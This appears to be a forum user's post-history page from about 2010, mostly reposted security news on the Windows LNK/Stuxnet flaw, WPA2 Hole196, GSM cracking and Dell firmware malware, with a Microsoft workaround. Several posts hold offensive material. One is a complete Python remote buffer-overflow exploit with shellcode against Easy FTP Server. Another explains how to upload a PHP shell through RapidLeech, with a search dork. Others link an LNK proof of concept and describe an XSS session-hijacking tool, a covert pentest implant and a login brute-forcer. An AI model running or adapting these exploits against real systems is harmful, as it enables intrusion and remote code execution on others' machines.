-
Posts
3972 -
Joined
-
Last visited
-
Days Won
22
Everything posted by begood
-
Files for analysis is not yet available Source: Zombie Infection Kit
-
WPA2, perceived as the most solid Wi-Fi security protocol, is widely used by enterprises for securing their Wi-Fi networks. But security researchers at AirTight have uncovered a vulnerability called "Hole196" in the WPA2 security protocol that exposes WPA2-secured Wi-Fi networks to malicious insiders. Exploiting the vulnerability, an insider can bypass WPA2 private key encryption and authentication to sniff and decrypt data from other authorized users as well as scan their Wi-Fi devices for vulnerabilities, install malware and possibly compromise those Wi-Fi devices. AirTight researcher, Md. Sohail Ahmad, will be demonstrating this vulnerability at the Black Hat Arsenal and at DEFCON18 in a presentation entitled "WPA Too?!" in Las Vegas on July 29th and July 31th respectively. WPA 2 Hole 196 Vulnerability
-
Features Issue scan commands remotely Wireless 802.11b ready Gigabit Ethernet capable 1.2 Ghz processor Linux, Perl, PHP, MySQL on-board Covertly disguised as power adapter Capable of invoking most Linux-based scan apps & scripts Intelligent scan engine Very low voltage use PlugBot is a research project and I plan to release the code for free under GPL license. Please help me fund this project by donating via Paypal! PlugBot is a drive-by bot. It's is a covert penetration testing device designed for use during physical penetration tests. PlugBot is a tiny computer that looks like a power adapter; this small size allows it to go physically undetected all the while powerful enough to scan, collect and deliver test results externally. How do you use it? Gain access to the target location (conference room?), plug the PlugBot in the nearest wall outlet and walk out. The PlugBot is configured to make an external connection (Wi-fi or Ethernet) to a specified IP address to receive instructions. Central Command allows the penetration tester to invoke scripts and applications. Output as a result of testing is encrypted and securely transmitted to the Drop Zone where data is imported into Central Command for analysis by the pen tester. What's inside? What makes this little guy run is a 1.2 GHz processor, 512 MB RAM and drawing just under 5 watts of power. Extra hard disk space can be added with an SD card. Here are some of the on board components: 802.11b, Gigabit Ethernet, Bluetooth, 1.2 GHz processor, 512MB RAM, USNAP I/O, MicroSD socket and more. About the Inventor PlugBot was brought to life by security researcher and penetration tester, Jeremiah Talamantes. Jeremiah (CISSP, CEH) has been in Information Security for over 13 years. He founded RedTeam Security, a Minneapolis based IT Security consulting company with a group of extremely talented close friends. The PlugBot ~ The PlugBot is a small form factor computer used for Physical Penetration Testing
-
IDG News Service - The Windows attack used by a recently discovered worm is being picked up by other virus writers and will soon become much more widespread, according to security vendor Eset. Eset reported Thursday that two new families of malicious software have popped up, both of which exploit a vulnerability in the way Windows processes .link files, used to provide shortcuts to other files on the system. The vulnerability was first exploited by the Stuxnet worm, discovered on computer systems in Iran last month. Highly sophisticated, Stuxnet targets systems running Siemens industrial control system management software. The worm steals SCADA (supervisory control and data acquisition) project files from Siemens' computer systems. Siemens issued a Security Update for its customers on Thursday, but Microsoft has yet to patch the Windows bug that permits the worm to spread. The newly discovered malware is "far less sophisticated" than Stuxnet and "suggests bottom feeders seizing on techniques developed by others," said Eset researcher Pierre-Marc Bureau, writing in a blog post. One of the new samples installs a keystroke logger, a tool hackers use to steal passwords and other data, on the victim's computer. "The server used to deliver the components used in this attack is presently located in the US, but the IP is assigned to a customer in China," Bureau said. The other variant could be used to install one of several different pieces of malicious software. As each new variant of the attack pops up, it adds pressure on Microsoft to patch the underlying vulnerability. Microsoft's next set of security patches is due Aug. 10, but if enough customers get infected, the company may be forced to rush out an emergency patch for the issue. Microsoft has already posted a temporary workaround to the problem and says it is working on a patch. Right now, the Stuxnet worm makes up a very tiny volume -- less than 1/100th of a percent -- of the malware that Eset is seeing on the Internet, said Randy Abrams, Eset's director of technical education, in an interview. However that's likely to change. "It's likely to become one of the most prevalent attack vectors," he said. "I expect that within a few months, we'll see hundreds if not thousands of pieces of malware using the link vulnerability." Virus writers are picking up new Microsoft attack - Computerworld //microsoft ar putea scrie un worm ce sa patchuiasca automat sistemul vulnerabil dupa ce a ajuns intr-un alt sistem vulnerabil dar nu o vor face
-
ce hash sha1 interesant are !
-
cine zice ca-i doar killswitch ?
-
Computer maker Dell is warning, according to The Register, that some of its server motherboards have been delivered to customers carrying an unwanted extra: computer malware. It could be confirmation that the "hardware trojans" long posited by some security experts are indeed a real threat. Unlike hard-drive-based computer viruses which can be disabled by antivirus software, a hardware trojan lives out of reach of such defences. It comprises some kind of alteration - by sabotage or accident - to the very heart of a computer: its microprocessors, memory chips or circuit boards. News that Dell may have a hardware trojan problem emerged on a support forum after a user was warned by a Dell call centre that the firm's PowerEdge R410 server motherboard contains spyware of unspecified function that a Dell engineer needed to come and remove. Dell confirms on the same forum: "The potential issue involves a small number of PowerEdge server motherboards sent out through service dispatches that may contain malware. This malware code has been detected on the embedded server management firmware." Firmware is the semi-permanent software that controls vital internal components. It will be fascinating to find out how the malware got into Dell's firmware, not least because firmware should have been subject to high physical and computer security procedures. But the threat of hardware Trojans has been recognised at the highest levels. The Pentagon is spending millions on research designed to ensure it can trust the microchips in critical systems, especially those made outside the US. Elsewhere, researchers are also investigating the threat from would-be chip-plant saboteurs, who poison the chip-making processes to introduce a "kill switch" that makes the chip fail unexpectedly. Short Sharp Science: PC giant warns of hardware trojan
-
# Exploit Title: RapidLeech Scrits Remote File Upload ( upload shell php ) # Date: 21/07/2010 # Author: H-SK33PY # Software Link: http://www.rapidleech.com/ # Version: all versions # Google dork :intitle:"Rx08.ii36B.Rv" # Platform / Tested on: linux # Category: remote # Code : N/A 010101010101010101010101010101010101010101010101010101010 0 0 1 Iranian Datacoders Security Team 2010 0 0 010101010101010101010101010101010101010101010101010101010 #BUG:######################################################################### After find the site of rapidleecher script on this : To Active For run this method change the name of shell code example : shell.php >>>>>>> to shell.php.001 or shell.php.00 After trasfer this you can run it in this Url : http://site.com/0x14/shell.php.001 or http://site.com/0x14/shell.php.00 ############################################################################# Website : http://www.datacoders.ir Special Thanks to : ccC0d3rZzz & all iranian datacoders members #############################################################################
-
IDG News Service - The (Global System for Mobile Communications) technology used by the majority of the world's mobile phones will get some scrutiny at next week's Black Hat security conference, and what the security researchers there have to say isn't pretty. On Friday, an open source effort to develop GSM-cracking software released software that cracks the A5/1 encryption algorithm used by some GSM networks. Called Kraken, this software uses new, very efficient, encryption cracking tables that allow it to break A5/1 encryption much faster than before. The software is key step toward eavesdropping on mobile phone conversations over GSM networks. Since GSM networks are the backbone of 3G, they also provide attackers with an avenue into the new generation of handsets. In December, the group released a set of encryption tables designed to speed up the arduous process of breaking A5/1 encryption, but the software component was incomplete. Now the software is done, and the tables are much more efficient than they were seven months ago. "The speed of how fast you could crack a call is probably orders of magnitude better than anything previously," said Frank Stevenson, a developer with the A5/1 Security Project. "We know we can do it in minutes; the question is, can we do it in seconds?" As the software becomes more polished it will make GSM call eavesdropping practical. "Our attack is so easy to carry out, and the cost of attack is lowered so significantly, that there is now a real danger of widespread intercepting of calls," Stevenson said. Stevenson and his co-developers haven't put together all the components someone would need to listen in on a call -- that would be illegal in some countries. Someone must still develop the radio listening equipment needed to gain access to the GSM signal, but that type of technology is within reach. Stevenson believes that this could be done using an inexpensive mobile phone and a modified version of open-source software called OsmocomBB. Hackers could also use a more-expensive Universal Software Radio Peripheral (USRP) device in conjunction with another program, called Airprobe. A5/1 Security Project leader Karsten Nohl will discuss the hardware and software setup for his project's GSM cracking tools at next week's conference. Last year there were about 3.5 billion GSM phones in use, according to data from the GSM Association. Not all of these phones are on networks that use A5/1 encryption -- some use the more-secure A5/3 algorithm; others use no encryption -- but a sizeable percentage are. In the U.S., both AT&T and T-Mobile operate GSM networks. The trade group that represents GSM network operators and equipment manufacturers, the GSM Association, has said in the past that A5/1 cracking efforts such as this are interesting, but attacks are extremely difficult to pull off in the real world. Intercepting mobile phone calls is illegal in many countries, including the U.S. The GSM Association did not respond to messages seeking comment for this story. Project developers say the point of their work is to show how easy it really would be to crack A/51 -- something they say that grey market commercial products are already doing. According to Stevenson many of these security problems are solved in next-generation mobile network technologies such as 3G and LTE (Long Term Evolution). However, even 3G phones can be compromised because they can roll back to GSM mode when a 3G network is not available. "You can choose to operate in 3G mode only, but then you will have very limited coverage," Stevenson said. "GSM has become the Achilles Heel of 3G security." Meanwhile, another Black Hat presenter, Chris Paget plans to demonstrate a completely different way to intercept GSM calls. He's setting up a fake cellular tower that masquerades as a legitimate GSM network. According to Paget, using open-source tools and a US$1,500 USRP radio, he can assemble his fake tower, called an IMSI (International Mobile Subscriber Identity) catcher. In a controlled experiment, he's going to set one up at Black Hat and invite audience members to connect their mobile phones. Once a phone has connected, Paget's tower tells it to drop encryption, giving him a way of listening in on calls. "I think there's been too much focus on the cryptographic weaknesses in GSM," he said. "People need to recognize that the cryptographic weaknesses are not the worst weaknesses in GSM. " New 'Kraken' GSM-cracking software is released - Computerworld
-
da-mi add si vorbim - i'm a fractal freak
-
prodil, tocmai ai descris un univers fractal. tu ce imagine ai la avatar ?
-
This is something that I used to always think and just stop at thinking only! But, the author of Shell of the Future has not only done that, but done it quite impressively. We had to rely on a lot of things and do a lot of stuff to show that a page was actually vulnerable for cross-site scripting (XSS). But thanks to this tool. It is very easy to leave behind ubiquitous “Alert ()” while displaying a XSS vulnerability to your clients. You can do a lot more! Shell of the Future is a Reverse Web Shell handler. In other words, it is the browser equivalent of a reverse command shell! Instead of a command prompt from which you type in commands and they get executed on the remote computer, you get to browse the victim’s HTTP/HTTPS session from your browser. Even though the site is being browsed from the your browser all the pages are fetched by the victim’s browser by tunneling HTTP over HTTP using HTML5 Cross Origin Requests. The hijacked session also displays a hovering banner which can be customized, making it the perfect POC for your pentest report. But, how do you browse the victim’s HTTP/HTTPS session from your browser? Simple – you set the victim’s browser to use Shell of the Future’s proxy server, start the tool and visit http://127.0.0.1/sotf.console from his browser. This can be done using JavaScripts easily, or manually too! This is the architecture of Shell of the Future: Shell of the Future has two main components: Proxy Server: The Pentester’s browser must be configured to use this as the proxy server. The proxy server listens on port 1337 by default. All requests sent by the Pentester’s browser are captured by this proxy which converts them in to JSON messages and sends them to the Shell of the Future web server. It regularly polls the web server to test if responses to those requests are available. If a response is available the proxy processes the response body to make changes like adding a banner etc(if enabled by the user) and sends the response to the pentester’s browser.If the browser is requesting static files like css or jpg files then these are directly fetched from the server. This feature is also configurable and can be turned off if required. Web Server: The web server gets all the requests from the proxy and stores it in a temporary database. When the victim polls the web server, the requests are sent to it. The victim fetches the response for these requests from the server and sends them back to the server which is again stored in the database. When the proxy polls the server looking for responses, this response is sent to it. The web server also serves JavaScript exploits to the victim. The author has been gracious enough to add two JavaScript exploits for us! They are: e1.js This exploit is the simpler of the two. Once injected in to the browser it polls the Shell of the Future server constantly checking for any new requests that must be fetched. If any requests are available these are sent in JSON format. The exploit fetches individual requests from the JSON object, fetches each of them from the server, encodes the response in hex and then sends it over to the Shell of the Future server. e2.js This exploit performs all the functions that e1.js does and in addition has an added feature to increase the lifetime of the injected script. It adds an invisible link to the page and adds a ‘onmousemove’ event handler so that the link is always under the cursor. When the victim clicks anywhere on the page, this link gets clicks and it opens the same site in a new tab. Transition between these two exploits is hardly noticeable and the victim would continue browsing the site in the new tab while the injected exploit would remain active in the other tab. For the ones with a programming streak, you can include your own e3.js & e4.js JavaScripts and they will be treated as exploits for the tool. As of now, everything is amazing with this tool. Just some caveats: Needs.NET framework 2.0 and above If the proxy or the server component must listen on a port less than 1024 then it must be run with administrator privileges. Does not properly work with Linux. Communication is a bit slow while browsing a victims session as it is routed between three points. Apart from these, we did not find any other problems with the tool. We know you must be interested in downloading it already! Download Shell of the Future v0.9 here. Shell of the Future: A Reverse Web Shell Handler! ? PenTestIT
-
pentru a nu astepta o eternitate dupa unetbootin (extrage si scrie extrem de greu pe USB) ce puteti face : 1. instalati teracopy (e freeware) 2. instalati winrar/7-zip 3. extrageti imaginea .iso intr-un folder 4. formatati stickul apoi copiati fisierele din folderul acela pe stick 5. rulati unetbootin cu diskimage ISO => pathul catre iso 6. cand va intreaba daca sa dea rewrite la fisiere apasati click pe NO de ... x ori (pana trece de partea de verificare) 7. lasati sa instaleze bootloaderul si apoi restart si boot de pe usb stick. de exemplu pentru a instala mandriva pe stick prin unetbootin mi-a luat 2 ore copierea fisierelor. cu metoda de mai sus in 10 min (max) a fost gata totul.
-
Microsoft is warning that attackers are exploiting a critical unpatched Windows vulnerability using infected USB flash drives. The bug admission is the first that affects Windows XP Service Pack 2 (SP2) since Microsoft retired the edition from support , researchers said. When Microsoft does fix the flaw, it will not be providing a patch for machines still running XP SP2. In a security advisory, Microsoft confirmed what other researchers had been saying for almost a month: Hackers have been exploiting a bug in Windows "shortcut" files, the placeholders typically dropped on the desktop or into the Start menu to represent links to actual files or programs.(See also "The Ultimate Guide to Windows 7 Security.") "In the wild, this vulnerability has been found operating in conjunction with the Stuxnet malware," Dave Forstrom, a director in Microsoft's Trustworthy Computing group, said in a post Friday to a company blog . Stuxnet is a clan of malware that includes a Trojan horse that downloads further attack code, including a rootkit that hides evidence of the attack. Forstrom characterized the threat as "limited, targeted attacks," but the Microsoft group responsible for crafting antivirus signatures said it had tracked 6,000 attempts to infect Windows PCs as of July 15. On Friday, Siemens alerted customers of its Simatic WinCC management software that attacks using the Windows vulnerability were targeting computers used to manage large-scale industrial control systems used by major manufacturing and utility companies. The vulnerability was first mentioned on June 17 in an alert issued by VirusBlokAda , a little-known security firm based in Belarus. Other security organizations, including U.K.-based Sophos and SANS Institute's Internet Storm Center , picked up on the threat Friday. Security blogger Brian Krebs , formerly with the Washington Post, reported on it Thursday. According to Microsoft, Windows fails to correctly parse shortcut files, identified by the ".lnk" extension. The flaw has been exploited most frequently using USB flash drives. By crafting a malicious .lnk file, hackers can hijack a Windows PC with little user interaction: All that's necessary is that the user views the contents of the USB drive with a file manager like Windows Explorer. Chester Wisniewski, a senior security advisory with Sophos, called the threat "nasty," and said his tests showed that the exploit works even when AutoRun and AutoPlay -- two functions that have previously been used by attackers to commandeer PCs using infected flash drives -- are disabled. The rootkit also bypasses all security mechanisms in Windows, including the User Account Control (UAC) prompts in Vista and Windows 7 , said Wisniewski in a blog entry Friday. Attacks can also be launched without using USB drives, Microsoft and Wisniewski both noted. "Affected shortcuts can also be distributed over network shares or remote WebDAV shares," said Microsoft's advisory. "[That makes] a very bad situation worse," said Wisniewski. Microsoft did not set a timeline for patching the zero-day vulnerability; its next Patch Tuesday is not until Aug. 10. For now, Microsoft said users could block attacks by disabling the displaying of shortcuts, and turning off the WebClient service. Both moves require editing the Windows registry, a chore most people avoid for fear of crippling their computers. Disabling shortcut files also will make it more difficult for users to launch programs or open documents. That advice is all the help that those still running Windows XP SP2, the service pack that was retired from all support last Tuesday, will get from Microsoft. "Noticeably absent from [Microsoft's list of affected software] are Windows 2000 and Windows XP SP2 as they are no longer supported," said Wisniewski. "They are, however, definitely still vulnerable." Microsoft also retired all editions of Windows 2000 from support last week. Wolfgang Kandek, the chief technology officer of Qualys, echoed Wisniewski's concerns about XP SP2 and Windows 2000 going patchless. "We assume the attack works against both of them and attackers will surely take advantage of this security hole ," Kandek said Saturday. Microsoft said that all still-supported versions of Windows, including Windows XP SP3, Vista, Server 2003, Windows 7, Server 2008 and Server 2008 R2, contain the bug. The betas of Windows 7 SP1 and Server 2008 R2 SP1, which the company released last week, are also at risk. Windows XP SP2 users must upgrade to XP SP3 to receive a patch for the shortcut flaw when it eventually ships. Microsoft Warns of Zero-Day Windows Hole - PCWorld http://rstcenter.com/forum/24397-vulnerability-windows-lnk-files.rst http://rstcenter.com/forum/24396-cve-2010-2568-lnk-code-execution-proof-concept.rst#post162288
- 1 reply
-
- 1
-
Workaround refers to a setting or configuration change that does not correct the underlying issue but would help block known attack vectors before you apply the update. Microsoft has tested the following workarounds and states in the discussion whether a workaround reduces functionality: •Disable the displaying of icons for shortcuts Note Using Registry Editor incorrectly can cause serious problems that may require you to reinstall your operating system. Microsoft cannot guarantee that problems resulting from the incorrect use of Registry Editor can be solved. Use Registry Editor at your own risk. For information about how to edit the registry, view the "Changing Keys And Values" Help topic in Registry Editor (Regedit.exe) or view the "Add and Delete Information in the Registry" and "Edit Registry Data" Help topics in Regedt32.exe. 1. Click Start, click Run, type Regedit in the Open box, and then click OK 2. Locate and then click the following registry key: HKEY_CLASSES_ROOT\lnkfile\shellex\IconHandler 3. Click the File menu and select Export 4. In the Export Registry File dialog box, enter LNK_Icon_Backup.reg and click Save Note This will create a backup of this registry key in the My Documents folder by default 5. Select the value (Default) on the right hand window in the Registy Editor. Press Enter to edit the value of the key. Remove the value, so that the value is blank, and press Enter. 6. Restart explorer.exe or restart the computer. Impact of workaround.Disabling icons from being displayed for shortcuts prevents the issue from being exploited on affected systems. When this workaround is implemented, shortcut files and Internet Explorer shortcuts will no longer have an icon displayed. •Disable the WebClient service Disabling the WebClient service helps protect affected systems from attempts to exploit this vulnerability by blocking the most likely remote attack vector through the Web Distributed Authoring and Versioning (WebDAV) client service. After applying this workaround, it will still be possible for remote attackers who successfully exploited this vulnerability to cause Microsoft Office Outlook to run programs located on the targeted user's computer or the Local Area Network (LAN), but users will be prompted for confirmation before opening arbitrary programs from the Internet. To disable the WebClient Service, follow these steps: 1. Click Start, click Run, type Services.msc and then click OK. 2. Right-click WebClient service and select Properties. 3. Change the Startup type to Disabled. If the service is running, click Stop. 4. Click OK and exit the management application. Impact of workaround. When the WebClient service is disabled, Web Distributed Authoring and Versioning (WebDAV) requests are not transmitted. In addition, any services that explicitly depend on the Web Client service will not start, and an error message will be logged in the System log. For example, WebDAV shares will be inaccessible from the client computer. How to undo the workaround. To re-enable the WebClient Service, follow these steps: 1. Click Start, click Run, type Services.msc and then click OK. 2. Right-click WebClient service and select Properties. 3. Change the Startup type to Automatic. If the service is not running, click Start. 4. Click OK and exit the management application. http://www.microsoft.com/technet/security/advisory/2286198.mspx
-
We've received plenty of information over the past couple days about this alleged vulnerability in Windows's "lnk" file, and it's use against "SCADA" networks. Windows Shortcut Flaw underpins power plant Trojan ? The Register Experts Warn of New Windows Shortcut Flaw — Krebs on Security UPDATE: Two of our Handlers have copies of it now on their analyzation systems. Thank you, we will analyze it. UPDATE 2: We have been notified via our comments that Symantec has definitions for this malware as well now. -- Joel Esler | http://blog.joelesler.net | Joel Esler (JoelEsler) on Twitter UPDATE 3 (from Bojan): Microsoft posted the advisory about the vulnerability in Windows Shell that has been exploited in some targeted attacks (the advisory is at Microsoft Security Advisory (2286198): Vulnerability in Windows Shell Could Allow Remote Code Execution). I've tested the exploit and can confirm that it works in Windows XP, Vista and Windows 7. The exploit uses a specially crafted LNK file. This file allows the attacker to execute an arbitrary file by carefully specifying its location – the LNK file in itself does not exploit any vulnerability such as buffer overflows, for example, so it is a legitimate LNK file. The LNK file used in targeted attacks was manually crafted as some fields that are normally present, such as CreationTime, AccessTime or WriteTime are all set to 0. I will not be posting details about how the exploit works, but here are some things that you should be aware of: If autorun is disabled, when a USB device with malicious LNK files is inserted, the exploit will not be triggered automatically. The exploit is triggered every time a folder containing a malicious LNK files is opened (for example, with Windows Explorer). It does not matter where this folder is – it does not have to be on a USB device, but in order to execute to malicious binary, the attacker has to specify its location correctly. What makes this vulnerability extremely serious is the fact that it can be opened from any place, including remote shares, for example. The victim just has to browse to the remote share in order to trigger the vulnerability. So double check permissions on any remote shares you use in your companies (you shouldn't allow users to write in root folders, for example). Some AV vendors started adding detection for these LNK files, although it is still very, very bad. We will, of course, keep an eye on the development of this. Vulnerability in Windows "LNK" files? http://rstcenter.com/forum/24396-cve-2010-2568-lnk-code-execution-proof-concept.rst#post162288
-
Ivanlef0u release a POC for the exploit used in targeted attacks : http://ivanlef0u.nibbles.fr/repo/suckme.rar More information : ISC SANS USCERT 940193 Callstack: kd> g Breakpoint 1 hit eax=00000001 ebx=00f5ee7c ecx=0000c666 edx=00200003 esi=00000001 edi=7c80a6e4 eip=7ca78712 esp=00f5e9c4 ebp=00f5ec18 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 SHELL32!_LoadCPLModule+0x10d: 001b:7ca78712 ff15a0159d7c call dword ptr [sHELL32!_imp__LoadLibraryW (7c9d15a0)] ds:0023:7c9d15a0={kernel32!LoadLibraryW (7c80aeeb)} kd> dd esp 00f5e9c4 00f5ee7c 000a27bc 00f5ee78 00000000 00f5e9d4 00000020 00000008 00f5ee7c 00000000 00f5e9e4 00000000 0000007b 00000000 00000000 00f5e9f4 00200073 002000e0 0000064c 0000028c 00f5ea04 1530000a 00000000 003a0043 0064005c 00f5ea14 006c006c 0064002e 006c006c 006d002e 00f5ea24 006e0061 00660069 00730065 00000074 00f5ea34 00090608 7c92005d 00000000 00000007 kd> db 00f5ee7c 00f5ee7c 43 00 3a 00 5c 00 64 00-6c 00 6c 00 2e 00 64 00 C.:.\.d.l.l...d. 00f5ee8c 6c 00 6c 00 00 00 92 7c-c8 f2 f5 00 00 17 72 02 l.l....|......r. 00f5ee9c 4b d2 00 00 d8 f2 f5 00-8b d2 a1 7c 00 00 00 00 K..........|.... 00f5eeac ac 80 9d 7c 30 d8 0d 00-34 d8 0d 00 b8 d7 0d 00 ...|0...4....... 00f5eebc 9a d2 a1 7c 30 d8 0d 00-c8 f2 f5 00 50 40 15 00 ...|0.......P@.. 00f5eecc 50 40 15 00 00 00 00 00-b8 00 92 7c 40 b7 0c 00 P@.........|@... 00f5eedc a8 ef f5 00 41 00 92 7c-18 07 09 00 5d 00 92 7c ....A..|....]..| 00f5eeec c8 f2 f5 00 00 ef f5 00-00 00 00 00 b8 00 92 7c ...............| kd> kv ChildEBP RetAddr Args to Child 00f5ec18 7ca81a74 00f5ee7c 000a27bc 00f5f2c4 SHELL32!_LoadCPLModule+0x10d (FPO: [1,145,4]) 00f5ee50 7ca82543 00f5ee74 000a27bc 000a27c0 SHELL32!CPL_LoadAndFindApplet+0x4a (FPO: [4,136,4]) 00f5f294 7cb56065 000a25b4 000a27bc 000a27c0 SHELL32!CPL_FindCPLInfo+0x46 (FPO: [4,264,4]) 00f5f2b8 7ca13714 00000082 00000000 00000104 SHELL32!CCtrlExtIconBase::_GetIconLocationW+0x7b (FPO: [5,0,0]) 00f5f2d4 7ca1d306 000a25ac 00000082 00f5f570 SHELL32!CExtractIconBase::GetIconLocation+0x1f (FPO: [6,0,0]) 00f5f410 7ca133b6 000dd7e0 00000082 00f5f570 SHELL32!CShellLink::GetIconLocation+0x69 (FPO: [6,68,4]) 00f5f77c 7ca03c88 000dd7e0 00000000 0015aa00 SHELL32!_GetILIndexGivenPXIcon+0x9c (FPO: [5,208,4]) 00f5f7a4 7ca06693 00131c60 000dd7e0 0015aa00 SHELL32!SHGetIconFromPIDL+0x90 (FPO: [5,0,4]) 00f5fe20 7ca12db0 00131c64 0015aa00 00000000 SHELL32!CFSFolder::GetIconOf+0x24e (FPO: [4,405,4]) 00f5fe40 7ca15e3c 00131c60 00131c64 0015aa00 SHELL32!SHGetIconFromPIDL+0x20 (FPO: [5,0,0]) 00f5fe68 7ca03275 000f8090 0014d5b0 0014a910 SHELL32!CGetIconTask::RunInitRT+0x47 (FPO: [1,2,4]) 00f5fe84 75f11b9a 000f8090 75f11b18 75f10000 SHELL32!CRunnableTask::Run+0x54 (FPO: [1,1,4]) 00f5fee0 77f49598 00155658 000cb748 77f4957b BROWSEUI!CShellTaskScheduler_ThreadProc+0x111 (FPO: [1,17,0]) 00f5fef8 7c937ac2 000cb748 7c98e440 0014cfe0 SHLWAPI!ExecuteWorkItem+0x1d (FPO: [1,0,4]) 00f5ff40 7c937b03 77f4957b 000cb748 00000000 ntdll!RtlpWorkerCallout+0x70 (FPO: [Non-Fpo]) 00f5ff60 7c937bc5 00000000 000cb748 0014cfe0 ntdll!RtlpExecuteWorkerRequest+0x1a (FPO: [3,0,0]) 00f5ff74 7c937b9c 7c937ae9 00000000 000cb748 ntdll!RtlpApcCallout+0x11 (FPO: [4,0,0]) 00f5ffb4 7c80b729 00000000 00edfce4 00edfce8 ntdll!RtlpWorkerThread+0x87 (FPO: [1,7,0]) 00f5ffec 00000000 7c920250 00000000 00000000 kernel32!BaseThreadStart+0x37 (FPO: [Non-Fpo]) Secdev - Thierry Zoller: CVE-2010-2568 - LNK Code execution - Proof of concept
-
Cheat Sheets & Quick Reference Cards for Developers | DevCheatSheet.com
-
#!/usr/bin/pythonimport socket,sys # Tested on XP Pro SP2 [ Eng ] and XP Pro SP3 [ Eng ] print """ # **************************************************************************** # # * Easy FTP Server v1.7.0.11 [MKD] Remote BoF Exploit Post Authentication * * Author / Discovered by : Karn Ganeshen * * Date : July 5, 2010 * * KarnGaneshen [aT] gmail [d0t] com * * http://ipositivesecurity.blogspot.com * # # **************************************************************************** # """ if len(sys.argv) != 3: print "Usage: ./easyftp_mkd.py <Target IP> <Port>" sys.exit(1) target = sys.argv[1] port = int(sys.argv[2]) # Buffer needed -> 272 bytes # Metasploit Shellcode PoC - Calc.exe [ 228 bytes ] [ shikata_ga_nai - 1 iteration ] [ badchars \x00\x0a\x2f\x5c ] shellcode = ("\xda\xc0\xd9\x74\x24\xf4\xbb\xe6\x9a\xc9\x6d\x5a\x33\xc9\xb1" "\x33\x31\x5a\x18\x83\xea\xfc\x03\x5a\xf2\x78\x3c\x91\x12\xf5" "\xbf\x6a\xe2\x66\x49\x8f\xd3\xb4\x2d\xdb\x41\x09\x25\x89\x69" "\xe2\x6b\x3a\xfa\x86\xa3\x4d\x4b\x2c\x92\x60\x4c\x80\x1a\x2e" "\x8e\x82\xe6\x2d\xc2\x64\xd6\xfd\x17\x64\x1f\xe3\xd7\x34\xc8" "\x6f\x45\xa9\x7d\x2d\x55\xc8\x51\x39\xe5\xb2\xd4\xfe\x91\x08" "\xd6\x2e\x09\x06\x90\xd6\x22\x40\x01\xe6\xe7\x92\x7d\xa1\x8c" "\x61\xf5\x30\x44\xb8\xf6\x02\xa8\x17\xc9\xaa\x25\x69\x0d\x0c" "\xd5\x1c\x65\x6e\x68\x27\xbe\x0c\xb6\xa2\x23\xb6\x3d\x14\x80" "\x46\x92\xc3\x43\x44\x5f\x87\x0c\x49\x5e\x44\x27\x75\xeb\x6b" "\xe8\xff\xaf\x4f\x2c\x5b\x74\xf1\x75\x01\xdb\x0e\x65\xed\x84" "\xaa\xed\x1c\xd1\xcd\xaf\x4a\x24\x5f\xca\x32\x26\x5f\xd5\x14" "\x4e\x6e\x5e\xfb\x09\x6f\xb5\xbf\xe5\x25\x94\x96\x6d\xe0\x4c" "\xab\xf0\x13\xbb\xe8\x0c\x90\x4e\x91\xeb\x88\x3a\x94\xb0\x0e" "\xd6\xe4\xa9\xfa\xd8\x5b\xca\x2e\xbb\x3a\x58\xb2\x12\xd8\xd8" "\x51\x6b\x28") nopsled = "\x90" * 40 ret = "\x10\x3B\x88\00" # MAGIC RET 00883B10 (SP2) / 00893B58 (SP3) [ EBP points to nopsled when overflowed ] payload = nopsled + shellcode + ret print "[+] Launching exploit against " + target + "..." s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: connect=s.connect((target, port)) print "[+] Connected!" except: print "[!] Connection failed!" sys.exit(0) s.recv(1024) # Targetting default user 'anonymous' on the target s.send('USER anonymous\r\n') s.recv(1024) s.send('PASS anonymous\r\n') s.recv(1024) print "[+] Sending payload..." s.send('MKD ' + payload + '\r\n') print "[!] Verifying if the user has 'Create Directory' permission. This may take some time..." try: s.recv(1024) print "[!] Uhh.. User does not have MKD privilege. +++Exploit failed+++" except: print "[+] +++Exploit Successful+++ ^_^" s.close()
-
We wrote about Bruter v1.0 ALPHA version back in 2008, recently they announced the release of v1.0 Final! Bruter is a parallel network login brute-forcer on Win32. This tool is intended to demonstrate the importance of choosing strong passwords. The goal of Bruter is to support a variety of services that allow remote authentication. It currently supports following services: FTP HTTP (Basic) HTTP (Form) IMAP MSSQL MySQL POP3 SMB-NT SMTP SNMP SSH2 Telnet VNC Recent Changes Re-licensed to new-BSD license Added proxy support (CONNECT, SOCKS4, SOCKS5) Allowed more delimiter in combo file Added password length filtered in combo and dictionary mode Fixed miscellaneous bugs Updated openssl library to 0.9.8n You can download Bruter v1.0 Final here: Bruter_1.0.zip Or read more here. Bruter v1.0 Final Released – Parallel Network Login Brute Forcing Tool | Darknet - The Darkside
-
Multiupload.com - upload your files to multiple file hosting sites!
-
macar te-ai trezit la realitate.
-
Hello fd-list folks. I recently demonstrated at Athcon, a new security conference taking place in Athens - Greece, a new stealthy port scanning attack that is made possible by abusing XMPP. The technique uses a "zombie" host (that can be anyone in your [most probably fake] friend/contact list) and some timing calculations in order to conduct a portscan through that proxy to any target. The IP address is never revealed to the scanned victim, the same way the famous idle/zombie scan, discovered by antirez, works. The idea, a proof of concept pidgin patch and a detailed analysis can be read in the paper. You can find the whitepaper here: http://sock-raw.org/papers/abusing_network_protocols and the presentation slides: http://sock-raw.org/papers/anp_presentation.pdf It is interesting to see how protocols like seemingly "innocent" protocols like XMPP can still be abused to do things like the above attack. Regards, ithilgore Full Disclosure: A new zombie port scanning attack -- http://sock-raw.org ithilgore (ithilgore) on Twitter
-
The level of secrecy shrouding the EU’s ACTA negotiations reached new heights earlier this week, with the news that Pirate Party MEP Christian Engstrom felt compelled to abandon a meeting with ACTA negotiators in the European Parliament after he was forbidden from sharing information with the public. According to a write-up on TorrentFreak, a blog dedicated to bringing the latest news about BitTorrent, Commission negotiators were scheduled to update European parliamentarians on progress in the latest round of ACTA negotiations in Lucerne. An invite went out to Pirate Party MEP Christian Engstrom, but the meeting was closed to the public and, he was informed, he was not allowed to share any information he obtained at the meeting with his electors. According to Engstrom: "At first the Commission seemed unwilling to answer this question with a straight yes or no, but after I had repeated the question a number of times, they finally came out and said that I would not be allowed to spread the information given." He then left the room, complaining that he was "not prepared to accept information given under such conditions in this particular case". Engstrom further accused the Commission of a "disgraceful" violation of the Lisbon Treaty, which requires full information to be provided to the European Parliament. A secret oral meeting with no documents handed out certainly does not meet this condition. One reason for nervousness on the part of ACTA negotiators may lie in an embarrassing leak earlier this year. French digital rights group 